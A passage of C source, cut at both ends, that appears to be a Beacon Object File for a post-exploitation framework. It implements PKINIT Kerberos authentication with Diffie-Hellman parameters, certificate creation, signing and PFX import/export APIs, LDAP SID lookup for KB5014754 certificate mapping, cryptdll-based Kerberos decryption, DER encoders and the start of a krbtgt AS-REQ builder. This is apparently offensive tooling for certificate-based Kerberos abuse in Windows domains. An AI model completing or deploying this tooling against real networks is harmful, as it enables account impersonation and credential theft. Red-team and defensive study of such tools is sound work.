    0x29, 0x02, 0x4E, 0x08, 0x8A, 0x67, 0xCC, 0x74,
    0x02, 0x0B, 0xBE, 0xA6, 0x3B, 0x13, 0x9B, 0x22,
    0x51, 0x4A, 0x08, 0x79, 0x8E, 0x34, 0x04, 0xDD,
    0xEF, 0x95, 0x19, 0xB3, 0xCD, 0x3A, 0x43, 0x1B,
    0x30, 0x2B, 0x0A, 0x6D, 0xF2, 0x5F, 0x14, 0x37,
    0x4F, 0xE1, 0x35, 0x6D, 0x6D, 0x51, 0xC2, 0x45,
    0xE4, 0x85, 0xB5, 0x76, 0x62, 0x5E, 0x7E, 0xC6,
    0xF4, 0x4C, 0x42, 0xE9, 0xA6, 0x37, 0xED, 0x6B,
    0x0B, 0xFF, 0x5C, 0xB6, 0xF4, 0x06, 0xB7, 0xED,
    0xEE, 0x38, 0x6B, 0xFB, 0x5A, 0x89, 0x9F, 0xA5,
    0xAE, 0x9F, 0x24, 0x11, 0x7C, 0x4B, 0x1F, 0xE6,
    0x49, 0x28, 0x66, 0x51, 0xEC, 0xE6, 0x53, 0x81,
    0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF
};
static const BYTE DH_G_MODP2[] = { 0x02 };

#define szOID_NT_PRINCIPAL_NAME "1.3.6.1.4.1.311.20.2.3"

/* PKINIT OIDs - RFC 4556 */
#define szOID_PKINIT_AUTHDATA   "1.3.6.1.5.2.3.1"  /* id-pkinit-authData */
#define szOID_PKINIT_DHKEYSDATA "1.3.6.1.5.2.3.2"  /* id-pkinit-DHKeyData */

/* Global state for PKINIT */
static BYTE g_dhPrivateKey[128];
static BYTE g_dhPublicKey[128];
static BYTE g_sessionKey[32];
static BYTE g_replyKey[32];
static int g_nonce;

/*
 * =============================================================================
 * Function Declarations for DFR
 * =============================================================================
 */

#ifdef BOF
/* Winsock */
DECLSPEC_IMPORT int WSAAPI WS2_32$WSAStartup(WORD, LPWSADATA);
DECLSPEC_IMPORT int WSAAPI WS2_32$WSACleanup(void);
DECLSPEC_IMPORT SOCKET WSAAPI WS2_32$socket(int, int, int);
DECLSPEC_IMPORT int WSAAPI WS2_32$connect(SOCKET, const struct sockaddr*, int);
DECLSPEC_IMPORT int WSAAPI WS2_32$send(SOCKET, const char*, int, int);
DECLSPEC_IMPORT int WSAAPI WS2_32$recv(SOCKET, char*, int, int);
DECLSPEC_IMPORT int WSAAPI WS2_32$closesocket(SOCKET);
DECLSPEC_IMPORT struct hostent* WSAAPI WS2_32$gethostbyname(const char*);
DECLSPEC_IMPORT unsigned long WSAAPI WS2_32$inet_addr(const char*);
DECLSPEC_IMPORT unsigned short WSAAPI WS2_32$htons(unsigned short);
DECLSPEC_IMPORT unsigned long WSAAPI WS2_32$htonl(unsigned long);
DECLSPEC_IMPORT unsigned long WSAAPI WS2_32$ntohl(unsigned long);

/* Crypto - ADVAPI32 */
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptAcquireContextW(HCRYPTPROV*, LPCWSTR, LPCWSTR, DWORD, DWORD);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptReleaseContext(HCRYPTPROV, DWORD);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptGenKey(HCRYPTPROV, ALG_ID, DWORD, HCRYPTKEY*);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptDestroyKey(HCRYPTKEY);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptGenRandom(HCRYPTPROV, DWORD, BYTE*);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptCreateHash(HCRYPTPROV, ALG_ID, HCRYPTKEY, DWORD, HCRYPTHASH*);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptHashData(HCRYPTHASH, const BYTE*, DWORD, DWORD);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptGetHashParam(HCRYPTHASH, DWORD, BYTE*, DWORD*, DWORD);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptDestroyHash(HCRYPTHASH);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptExportKey(HCRYPTKEY, HCRYPTKEY, DWORD, DWORD, BYTE*, DWORD*);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptImportKey(HCRYPTPROV, const BYTE*, DWORD, HCRYPTKEY, DWORD, HCRYPTKEY*);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptSetKeyParam(HCRYPTKEY, DWORD, const BYTE*, DWORD);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptDecrypt(HCRYPTKEY, HCRYPTHASH, BOOL, DWORD, BYTE*, DWORD*);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptSignHashW(HCRYPTHASH, DWORD, LPCWSTR, DWORD, BYTE*, DWORD*);

/* Crypto - CRYPT32 */
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CryptEncodeObjectEx(DWORD, LPCSTR, const void*, DWORD, PCRYPT_ENCODE_PARA, void*, DWORD*);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CryptDecodeObjectEx(DWORD, LPCSTR, const BYTE*, DWORD, DWORD, PCRYPT_DECODE_PARA, void*, DWORD*);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CryptBinaryToStringA(const BYTE*, DWORD, DWORD, LPSTR, DWORD*);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CryptStringToBinaryA(LPCSTR, DWORD, DWORD, BYTE*, DWORD*, DWORD*, DWORD*);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CertStrToNameA(DWORD, LPCSTR, DWORD, void*, BYTE*, DWORD*, LPCSTR*);
DECLSPEC_IMPORT PCCERT_CONTEXT WINAPI CRYPT32$CertCreateCertificateContext(DWORD, const BYTE*, DWORD);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CertFreeCertificateContext(PCCERT_CONTEXT);
DECLSPEC_IMPORT HCERTSTORE WINAPI CRYPT32$CertOpenStore(LPCSTR, DWORD, HCRYPTPROV_LEGACY, DWORD, const void*);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CertCloseStore(HCERTSTORE, DWORD);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CertAddCertificateContextToStore(HCERTSTORE, PCCERT_CONTEXT, DWORD, PCCERT_CONTEXT*);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CertSetCertificateContextProperty(PCCERT_CONTEXT, DWORD, DWORD, const void*);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$PFXExportCertStoreEx(HCERTSTORE, CRYPT_DATA_BLOB*, LPCWSTR, void*, DWORD);
DECLSPEC_IMPORT HCERTSTORE WINAPI CRYPT32$PFXImportCertStore(CRYPT_DATA_BLOB*, LPCWSTR, DWORD);
DECLSPEC_IMPORT PCCERT_CONTEXT WINAPI CRYPT32$CertEnumCertificatesInStore(HCERTSTORE, PCCERT_CONTEXT);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CryptAcquireCertificatePrivateKey(PCCERT_CONTEXT, DWORD, void*, HCRYPTPROV_OR_NCRYPT_KEY_HANDLE*, DWORD*, BOOL*);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CryptSignMessage(PCRYPT_SIGN_MESSAGE_PARA, BOOL, DWORD, const BYTE*[], DWORD[], BYTE*, DWORD*);
DECLSPEC_IMPORT HCRYPTMSG WINAPI CRYPT32$CryptMsgOpenToEncode(DWORD, DWORD, DWORD, const void*, LPSTR, PCMSG_STREAM_INFO);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CryptMsgUpdate(HCRYPTMSG, const BYTE*, DWORD, BOOL);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CryptMsgGetParam(HCRYPTMSG, DWORD, DWORD, void*, DWORD*);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CryptMsgClose(HCRYPTMSG);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CryptExportPublicKeyInfo(HCRYPTPROV, DWORD, DWORD, PCERT_PUBLIC_KEY_INFO, DWORD*);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CryptSignAndEncodeCertificate(HCRYPTPROV_OR_NCRYPT_KEY_HANDLE, DWORD, DWORD, LPCSTR, const void*, PCRYPT_ALGORITHM_IDENTIFIER, const void*, BYTE*, DWORD*);

/* COM */
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx(LPVOID, DWORD);
DECLSPEC_IMPORT void WINAPI OLE32$CoUninitialize(void);
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstance(REFCLSID, LPUNKNOWN, DWORD, REFIID, LPVOID*);
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateGuid(GUID*);
DECLSPEC_IMPORT BSTR WINAPI OLEAUT32$SysAllocString(const OLECHAR*);
DECLSPEC_IMPORT void WINAPI OLEAUT32$SysFreeString(BSTR);

/* NetAPI */
DECLSPEC_IMPORT DWORD WINAPI NETAPI32$DsGetDcNameW(LPCWSTR, LPCWSTR, GUID*, LPCWSTR, ULONG, PDOMAIN_CONTROLLER_INFOW*);
DECLSPEC_IMPORT DWORD WINAPI NETAPI32$NetApiBufferFree(LPVOID);

/* Kernel32 */
DECLSPEC_IMPORT HLOCAL WINAPI KERNEL32$LocalAlloc(UINT, SIZE_T);
DECLSPEC_IMPORT HLOCAL WINAPI KERNEL32$LocalFree(HLOCAL);
DECLSPEC_IMPORT HMODULE WINAPI KERNEL32$LoadLibraryA(LPCSTR);
DECLSPEC_IMPORT FARPROC WINAPI KERNEL32$GetProcAddress(HMODULE, LPCSTR);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$FreeLibrary(HMODULE);
DECLSPEC_IMPORT int WINAPI KERNEL32$MultiByteToWideChar(UINT, DWORD, LPCCH, int, LPWSTR, int);
DECLSPEC_IMPORT int WINAPI KERNEL32$WideCharToMultiByte(UINT, DWORD, LPCWCH, int, LPSTR, int, LPCCH, LPBOOL);
DECLSPEC_IMPORT void WINAPI KERNEL32$GetSystemTime(LPSYSTEMTIME);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$WriteFile(HANDLE, LPCVOID, DWORD, LPDWORD, LPOVERLAPPED);
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateFileW(LPCWSTR, DWORD, DWORD, LPSECURITY_ATTRIBUTES, DWORD, DWORD, HANDLE);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$CloseHandle(HANDLE);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$ReadFile(HANDLE, LPVOID, DWORD, LPDWORD, LPOVERLAPPED);
DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetFileSize(HANDLE, LPDWORD);
DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetLastError(void);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$GetComputerNameExW(int, LPWSTR, LPDWORD);

/* MSVCRT */
DECLSPEC_IMPORT void* __cdecl MSVCRT$malloc(size_t);
DECLSPEC_IMPORT void __cdecl MSVCRT$free(void*);
DECLSPEC_IMPORT void* __cdecl MSVCRT$memset(void*, int, size_t);
DECLSPEC_IMPORT void* __cdecl MSVCRT$memcpy(void*, const void*, size_t);
DECLSPEC_IMPORT int __cdecl MSVCRT$memcmp(const void*, const void*, size_t);
DECLSPEC_IMPORT size_t __cdecl MSVCRT$strlen(const char*);
DECLSPEC_IMPORT size_t __cdecl MSVCRT$wcslen(const wchar_t*);
DECLSPEC_IMPORT int __cdecl MSVCRT$sprintf(char*, const char*, ...);
DECLSPEC_IMPORT int __cdecl MSVCRT$swprintf(wchar_t*, const wchar_t*, ...);
DECLSPEC_IMPORT char* __cdecl MSVCRT$strcpy(char*, const char*);
DECLSPEC_IMPORT char* __cdecl MSVCRT$strcat(char*, const char*);
DECLSPEC_IMPORT char* __cdecl MSVCRT$strchr(const char*, int);
DECLSPEC_IMPORT wchar_t* __cdecl MSVCRT$wcscpy(wchar_t*, const wchar_t*);
DECLSPEC_IMPORT int __cdecl MSVCRT$_stricmp(const char*, const char*);
DECLSPEC_IMPORT int __cdecl MSVCRT$rand(void);
DECLSPEC_IMPORT void __cdecl MSVCRT$srand(unsigned int);
DECLSPEC_IMPORT time_t __cdecl MSVCRT$time(time_t*);

/* DFR macros */
#define WSAStartup WS2_32$WSAStartup
#define WSACleanup WS2_32$WSACleanup
#define socket WS2_32$socket
#define connect WS2_32$connect
#define send WS2_32$send
#define recv WS2_32$recv
#define closesocket WS2_32$closesocket
#define gethostbyname WS2_32$gethostbyname
#define inet_addr WS2_32$inet_addr
#define htons WS2_32$htons
#define htonl WS2_32$htonl
#define ntohl WS2_32$ntohl

#define CryptAcquireContextW ADVAPI32$CryptAcquireContextW
#define CryptReleaseContext ADVAPI32$CryptReleaseContext
#define CryptGenKey ADVAPI32$CryptGenKey
#define CryptDestroyKey ADVAPI32$CryptDestroyKey
#define CryptGenRandom ADVAPI32$CryptGenRandom
#define CryptCreateHash ADVAPI32$CryptCreateHash
#define CryptHashData ADVAPI32$CryptHashData
#define CryptGetHashParam ADVAPI32$CryptGetHashParam
#define CryptDestroyHash ADVAPI32$CryptDestroyHash
#define CryptExportKey ADVAPI32$CryptExportKey
#define CryptImportKey ADVAPI32$CryptImportKey
#define CryptSetKeyParam ADVAPI32$CryptSetKeyParam
#define CryptDecrypt ADVAPI32$CryptDecrypt
#define CryptSignHashW ADVAPI32$CryptSignHashW

#define CryptEncodeObjectEx CRYPT32$CryptEncodeObjectEx
#define CryptDecodeObjectEx CRYPT32$CryptDecodeObjectEx
#define CryptBinaryToStringA CRYPT32$CryptBinaryToStringA
#define CryptStringToBinaryA CRYPT32$CryptStringToBinaryA
#define CertStrToNameA CRYPT32$CertStrToNameA
#define CertCreateCertificateContext CRYPT32$CertCreateCertificateContext
#define CertFreeCertificateContext CRYPT32$CertFreeCertificateContext
#define CertOpenStore CRYPT32$CertOpenStore
#define CertCloseStore CRYPT32$CertCloseStore
#define CertAddCertificateContextToStore CRYPT32$CertAddCertificateContextToStore
#define CertSetCertificateContextProperty CRYPT32$CertSetCertificateContextProperty
#define PFXExportCertStoreEx CRYPT32$PFXExportCertStoreEx
#define PFXImportCertStore CRYPT32$PFXImportCertStore
#define CertEnumCertificatesInStore CRYPT32$CertEnumCertificatesInStore
#define CryptAcquireCertificatePrivateKey CRYPT32$CryptAcquireCertificatePrivateKey
#define CryptSignMessage CRYPT32$CryptSignMessage
#define CryptExportPublicKeyInfo CRYPT32$CryptExportPublicKeyInfo
#define CryptSignAndEncodeCertificate CRYPT32$CryptSignAndEncodeCertificate
#define CryptMsgOpenToEncode CRYPT32$CryptMsgOpenToEncode
#define CryptMsgUpdate CRYPT32$CryptMsgUpdate
#define CryptMsgGetParam CRYPT32$CryptMsgGetParam
#define CryptMsgClose CRYPT32$CryptMsgClose

#define CoInitializeEx OLE32$CoInitializeEx
#define CoUninitialize OLE32$CoUninitialize
#define CoCreateInstance OLE32$CoCreateInstance
#define CoCreateGuid OLE32$CoCreateGuid
#define SysAllocString OLEAUT32$SysAllocString
#define SysFreeString OLEAUT32$SysFreeString

#define DsGetDcNameW NETAPI32$DsGetDcNameW
#define NetApiBufferFree NETAPI32$NetApiBufferFree

#define LocalAlloc KERNEL32$LocalAlloc
#define LocalFree KERNEL32$LocalFree
#define LoadLibraryA KERNEL32$LoadLibraryA
#define GetProcAddress KERNEL32$GetProcAddress
#define FreeLibrary KERNEL32$FreeLibrary
#define MultiByteToWideChar KERNEL32$MultiByteToWideChar
#define WideCharToMultiByte KERNEL32$WideCharToMultiByte
#define GetSystemTime KERNEL32$GetSystemTime
#define WriteFile KERNEL32$WriteFile
#define CreateFileW KERNEL32$CreateFileW
#define CloseHandle KERNEL32$CloseHandle
#define ReadFile KERNEL32$ReadFile
#define GetFileSize KERNEL32$GetFileSize
#define GetLastError KERNEL32$GetLastError
#define GetComputerNameExW KERNEL32$GetComputerNameExW

#define malloc MSVCRT$malloc
#define free MSVCRT$free
#define memset MSVCRT$memset
#define memcpy MSVCRT$memcpy
#define memcmp MSVCRT$memcmp
#define strlen MSVCRT$strlen
#define wcslen MSVCRT$wcslen
#define sprintf MSVCRT$sprintf
#define swprintf MSVCRT$swprintf
#define strcpy MSVCRT$strcpy
#define strcat MSVCRT$strcat
#define strchr MSVCRT$strchr
#define wcscpy MSVCRT$wcscpy
#define _stricmp MSVCRT$_stricmp
#define rand MSVCRT$rand
#define srand MSVCRT$srand
#define time MSVCRT$time


/*
 * =============================================================================
 * LDAP DFR - SID Lookup Support for KB5014754 Strong Certificate Mapping
 * =============================================================================
 */

/* LDAP DFR declarations */
DECLSPEC_IMPORT LDAP* WINAPI WLDAP32$ldap_initW(PWSTR, ULONG);
DECLSPEC_IMPORT ULONG WINAPI WLDAP32$ldap_bind_sW(LDAP*, PWSTR, PWSTR, ULONG);
DECLSPEC_IMPORT ULONG WINAPI WLDAP32$ldap_search_sW(LDAP*, PWSTR, ULONG, PWSTR, PWSTR*, ULONG, LDAPMessage**);
DECLSPEC_IMPORT ULONG WINAPI WLDAP32$ldap_unbind(LDAP*);
DECLSPEC_IMPORT LDAPMessage* WINAPI WLDAP32$ldap_first_entry(LDAP*, LDAPMessage*);
DECLSPEC_IMPORT struct berval** WINAPI WLDAP32$ldap_get_values_lenW(LDAP*, LDAPMessage*, PWSTR);
DECLSPEC_IMPORT ULONG WINAPI WLDAP32$ldap_value_free_len(struct berval**);
DECLSPEC_IMPORT ULONG WINAPI WLDAP32$ldap_msgfree(LDAPMessage*);
DECLSPEC_IMPORT ULONG WINAPI WLDAP32$ldap_set_optionW(LDAP*, int, const void*);

DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$ConvertSidToStringSidA(PSID, LPSTR*);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$IsValidSid(PSID);
DECLSPEC_IMPORT DWORD WINAPI ADVAPI32$GetLengthSid(PSID);

#define ldap_initW WLDAP32$ldap_initW
#define ldap_bind_sW WLDAP32$ldap_bind_sW
#define ldap_search_sW WLDAP32$ldap_search_sW
#define ldap_unbind WLDAP32$ldap_unbind
#define ldap_first_entry WLDAP32$ldap_first_entry
#define ldap_get_values_lenW WLDAP32$ldap_get_values_lenW
#define ldap_value_free_len WLDAP32$ldap_value_free_len
#define ldap_msgfree WLDAP32$ldap_msgfree
#define ldap_set_optionW WLDAP32$ldap_set_optionW

#define ConvertSidToStringSidA ADVAPI32$ConvertSidToStringSidA
#define IsValidSid ADVAPI32$IsValidSid
#define GetLengthSid ADVAPI32$GetLengthSid

#endif /* BOF */

/*
 * =============================================================================
 * cryptdll.dll types for Kerberos decryption
 * =============================================================================
 */

/* CDLocateCSystem function pointer type */
typedef int (WINAPI *CDLocateCSystem_t)(int, void**);
typedef int (WINAPI *CDLocateCheckSum_t)(int, void**);

/*
 * =============================================================================
 * KERB_ECRYPT Structure for cryptdll.dll
 * =============================================================================
 */

typedef struct _KERB_ECRYPT {
    int Type0;
    int BlockSize;
    int Type1;
    int KeySize;
    int Size;
    int Type2;
    int Type3;
    void* AlgName;
    void* Initialize;
    void* Encrypt;
    void* Decrypt;
    void* Finish;
    void* HashPassword;
    void* RandomKey;
    void* Control;
} KERB_ECRYPT;

typedef int (WINAPI *KERB_ECRYPT_Initialize)(BYTE* key, int keySize, int keyUsage, void** pContext);
typedef int (WINAPI *KERB_ECRYPT_Decrypt)(void* pContext, BYTE* data, int dataSize, BYTE* output, int* outputSize);
typedef int (WINAPI *KERB_ECRYPT_Finish)(void** pContext);

/*
 * =============================================================================
 * ASN.1/DER Encoding Functions
 * =============================================================================
 */

/* Encode length in DER format */
static int EncodeLength(BYTE* buf, int len) {
    if (len < 128) {
        buf[0] = (BYTE)len;
        return 1;
    } else if (len < 256) {
        buf[0] = 0x81;
        buf[1] = (BYTE)len;
        return 2;
    } else if (len < 65536) {
        buf[0] = 0x82;
        buf[1] = (BYTE)(len >> 8);
        buf[2] = (BYTE)(len & 0xFF);
        return 3;
    } else {
        buf[0] = 0x83;
        buf[1] = (BYTE)(len >> 16);
        buf[2] = (BYTE)((len >> 8) & 0xFF);
        buf[3] = (BYTE)(len & 0xFF);
        return 4;
    }
}

/* Decode DER length */
static int DecodeLength(BYTE* data, int offset, int* length) {
    if ((data[offset] & 0x80) == 0) {
        *length = data[offset];
        return 1;
    } else {
        int numBytes = data[offset] & 0x7F;
        *length = 0;
        for (int i = 1; i <= numBytes; i++) {
            *length = (*length << 8) | data[offset + i];
        }
        return 1 + numBytes;
    }
}

/* Build DER SEQUENCE */
static BYTE* BuildSequence(BYTE* content, int contentLen, int* outLen) {
    int lenSize;
    BYTE lenBuf[4];
    BYTE* result;

    lenSize = EncodeLength(lenBuf, contentLen);
    *outLen = 1 + lenSize + contentLen;
    result = (BYTE*)malloc(*outLen);

    result[0] = 0x30; /* SEQUENCE */
    memcpy(result + 1, lenBuf, lenSize);
    memcpy(result + 1 + lenSize, content, contentLen);

    return result;
}

/* Build DER INTEGER from int */
static BYTE* BuildInteger(int value, int* outLen) {
    BYTE* result;
    if (value >= 0 && value < 128) {
        *outLen = 3;
        result = (BYTE*)malloc(3);
        result[0] = 0x02;
        result[1] = 0x01;
        result[2] = (BYTE)value;
    } else if (value >= 0 && value < 256) {
        *outLen = 4;
        result = (BYTE*)malloc(4);
        result[0] = 0x02;
        result[1] = 0x02;
        result[2] = 0x00;
        result[3] = (BYTE)value;
    } else {
        *outLen = 6;
        result = (BYTE*)malloc(6);
        result[0] = 0x02;
        result[1] = 0x04;
        result[2] = (BYTE)(value >> 24);
        result[3] = (BYTE)(value >> 16);
        result[4] = (BYTE)(value >> 8);
        result[5] = (BYTE)value;
    }
    return result;
}

/* Build DER INTEGER from bytes */
static BYTE* BuildIntegerFromBytes(BYTE* data, int dataLen, int* outLen) {
    BYTE* result;
    int lenSize;
    BYTE lenBuf[4];
    int needPadding = (data[0] & 0x80) ? 1 : 0;
    int totalDataLen = dataLen + needPadding;

    lenSize = EncodeLength(lenBuf, totalDataLen);
    *outLen = 1 + lenSize + totalDataLen;
    result = (BYTE*)malloc(*outLen);

    result[0] = 0x02; /* INTEGER */
    memcpy(result + 1, lenBuf, lenSize);
    if (needPadding) {
        result[1 + lenSize] = 0x00;
        memcpy(result + 2 + lenSize, data, dataLen);
    } else {
        memcpy(result + 1 + lenSize, data, dataLen);
    }

    return result;
}

/* Build DER OCTET STRING */
static BYTE* BuildOctetString(BYTE* data, int dataLen, int* outLen) {
    BYTE* result;
    int lenSize;
    BYTE lenBuf[4];

    lenSize = EncodeLength(lenBuf, dataLen);
    *outLen = 1 + lenSize + dataLen;
    result = (BYTE*)malloc(*outLen);

    result[0] = 0x04; /* OCTET STRING */
    memcpy(result + 1, lenBuf, lenSize);
    memcpy(result + 1 + lenSize, data, dataLen);

    return result;
}

/* Build DER BIT STRING */
static BYTE* BuildBitString(BYTE* data, int dataLen, int* outLen) {
    BYTE* result;
    int lenSize;
    BYTE lenBuf[4];

    lenSize = EncodeLength(lenBuf, dataLen + 1);
    *outLen = 1 + lenSize + 1 + dataLen;
    result = (BYTE*)malloc(*outLen);

    result[0] = 0x03; /* BIT STRING */
    memcpy(result + 1, lenBuf, lenSize);
    result[1 + lenSize] = 0x00; /* unused bits */
    memcpy(result + 2 + lenSize, data, dataLen);

    return result;
}

/* Build Context Tag [n] */
static BYTE* BuildContextTag(int tagNum, BYTE* content, int contentLen, int* outLen) {
    BYTE* result;
    int lenSize;
    BYTE lenBuf[4];

    lenSize = EncodeLength(lenBuf, contentLen);
    *outLen = 1 + lenSize + contentLen;
    result = (BYTE*)malloc(*outLen);

    result[0] = 0xA0 | tagNum; /* Context tag */
    memcpy(result + 1, lenBuf, lenSize);
    memcpy(result + 1 + lenSize, content, contentLen);

    return result;
}

/* Build APPLICATION tag */
static BYTE* BuildApplication(int appNum, BYTE* content, int contentLen, int* outLen) {
    BYTE* result;
    int lenSize;
    BYTE lenBuf[4];

    lenSize = EncodeLength(lenBuf, contentLen);
    *outLen = 1 + lenSize + contentLen;
    result = (BYTE*)malloc(*outLen);

    result[0] = 0x60 | appNum; /* APPLICATION constructed */
    memcpy(result + 1, lenBuf, lenSize);
    memcpy(result + 1 + lenSize, content, contentLen);

    return result;
}

/* Build GeneralString */
static BYTE* BuildGeneralString(const char* str, int* outLen) {
    int strLen = (int)strlen(str);
    int lenSize;
    BYTE lenBuf[4];
    BYTE* result;

    lenSize = EncodeLength(lenBuf, strLen);
    *outLen = 1 + lenSize + strLen;
    result = (BYTE*)malloc(*outLen);

    result[0] = 0x1B; /* GeneralString */
    memcpy(result + 1, lenBuf, lenSize);
    memcpy(result + 1 + lenSize, str, strLen);

    return result;
}

/* Build GeneralizedTime */
static BYTE* BuildGeneralizedTime(const char* timeStr, int* outLen) {
    int strLen = (int)strlen(timeStr);
    BYTE* result;

    *outLen = 2 + strLen;
    result = (BYTE*)malloc(*outLen);
    result[0] = 0x18; /* GeneralizedTime */
    result[1] = (BYTE)strLen;
    memcpy(result + 2, timeStr, strLen);

    return result;
}

/* Combine multiple byte arrays */
static BYTE* CombineBytes(BYTE** arrays, int* lengths, int count, int* outLen) {
    int totalLen = 0;
    for (int i = 0; i < count; i++) {
        totalLen += lengths[i];
    }

    BYTE* result = (BYTE*)malloc(totalLen);
    int offset = 0;
    for (int i = 0; i < count; i++) {
        memcpy(result + offset, arrays[i], lengths[i]);
        offset += lengths[i];
    }

    *outLen = totalLen;
    return result;
}

/*
 * =============================================================================
 * PKINIT - Build KDC-REQ-BODY
 * =============================================================================
 */

/* Build PrincipalName structure */
static BYTE* BuildPrincipalName(int nameType, const char* name1, const char* name2, int* outLen) {
    int offset = 0;
    BYTE* content = (BYTE*)malloc(1024);
    BYTE* nameStrings = (BYTE*)malloc(512);
    int nameStringsLen = 0;

    /* name-type [0] INTEGER */
    int nameTypeLen;
    BYTE* nameTypeInt = BuildInteger(nameType, &nameTypeLen);
    int nameTypeTagLen;
    BYTE* nameTypeTag = BuildContextTag(0, nameTypeInt, nameTypeLen, &nameTypeTagLen);
    memcpy(content + offset, nameTypeTag, nameTypeTagLen);
    offset += nameTypeTagLen;
    free(nameTypeInt);
    free(nameTypeTag);

    /* name-string [1] SEQUENCE OF GeneralString */
    int str1Len;
    BYTE* str1 = BuildGeneralString(name1, &str1Len);
    memcpy(nameStrings + nameStringsLen, str1, str1Len);
    nameStringsLen += str1Len;
    free(str1);

    if (name2 != NULL) {
        int str2Len;
        BYTE* str2 = BuildGeneralString(name2, &str2Len);
        memcpy(nameStrings + nameStringsLen, str2, str2Len);
        nameStringsLen += str2Len;
        free(str2);
    }

    int nameStrSeqLen;
    BYTE* nameStrSeq = BuildSequence(nameStrings, nameStringsLen, &nameStrSeqLen);
    int nameStrTagLen;
    BYTE* nameStrTag = BuildContextTag(1, nameStrSeq, nameStrSeqLen, &nameStrTagLen);
    memcpy(content + offset, nameStrTag, nameStrTagLen);
    offset += nameStrTagLen;
    free(nameStrSeq);
    free(nameStrTag);
    free(nameStrings);

    BYTE* result = BuildSequence(content, offset, outLen);
    free(content);
    return result;
}

/* Build KDC-REQ-BODY for AS-REQ */
static BYTE* BuildKdcReqBody(const char* user, const char* realm, int* outLen) {
    BYTE* content = (BYTE*)malloc(4096);
    int offset = 0;

    /* kdc-options [0] BIT STRING */
    /* Flags: forwardable (0x40), renewable (0x80), canonicalize (0x10), renewable-ok (0x10) */
    BYTE kdcOptions[] = { 0x03, 0x05, 0x00, 0x40, 0x81, 0x00, 0x10 };
    int kdcOptsTagLen;
    BYTE* kdcOptsTag = BuildContextTag(0, kdcOptions, sizeof(kdcOptions), &kdcOptsTagLen);
    memcpy(content + offset, kdcOptsTag, kdcOptsTagLen);
    offset += kdcOptsTagLen;
    free(kdcOptsTag);

    /* cname [1] PrincipalName (NT-PRINCIPAL = 1) */
    int cnameLen;
    BYTE* cname = BuildPrincipalName(1, user, NULL, &cnameLen);
    int cnameTagLen;
    BYTE* cnameTag = BuildContextTag(1, cname, cnameLen, &cnameTagLen);
    memcpy(content + offset, cnameTag, cnameTagLen);
    offset += cnameTagLen;
    free(cname);
    free(cnameTag);

    /* realm [2] GeneralString */
    int realmStrLen;
    BYTE* realmStr = BuildGeneralString(realm, &realmStrLen);
    int realmTagLen;
    BYTE* realmTag = BuildContextTag(2, realmStr, realmStrLen, &realmTagLen);
    memcpy(content + offset, realmTag, realmTagLen);
    offset += realmTagLen;
    free(realmStr);
    free(realmTag);

    /* sname [3] PrincipalName (NT-SRV-INST = 2, krbtgt/REALM) */
    int snameLen;
    BYTE* sname = BuildPrincipalName(2, "krbtgt", realm, &snameLen);
    int snameTagLen;
    BYTE* snameTag = BuildContextTag(3, sname, snameLen, &snameTagLen);
    memcpy(content + offset, snameTag, snameTagLen);
    offset += snameTagLen;
    free(sname);
    free(snameTag);

    /* till [5] KerberosTime (1 year from now) */
    SYSTEMTIME st;
    GetSystemTime(&st);
    char tillTime[20];
    sprintf(tillTime, "%04d%02d%02d%02d%02d%02dZ",
            st.wYear + 1, st.wMonth, st.wDay, st.wHour, st.wMinute, st.wSecond);
    int tillStrLen;
    BYTE* tillStr = BuildGeneralizedTime(tillTime, &tillStrLen);
    int tillTagLen;
    BYTE* tillTag = BuildContextTag(5, tillStr, tillStrLen, &tillTagLen);
    memcpy(content + offset, tillTag, tillTagLen);
    offset += tillTagLen;
    free(tillStr);
    free(tillTag);

    /* nonce [7] INTEGER */
    srand((unsigned int)time(NULL));
    g_nonce = 100000000 + (rand() % 899999999);
    int nonceLen;
    BYTE* nonceInt = BuildInteger(g_nonce, &nonceLen);
    int nonceTagLen;
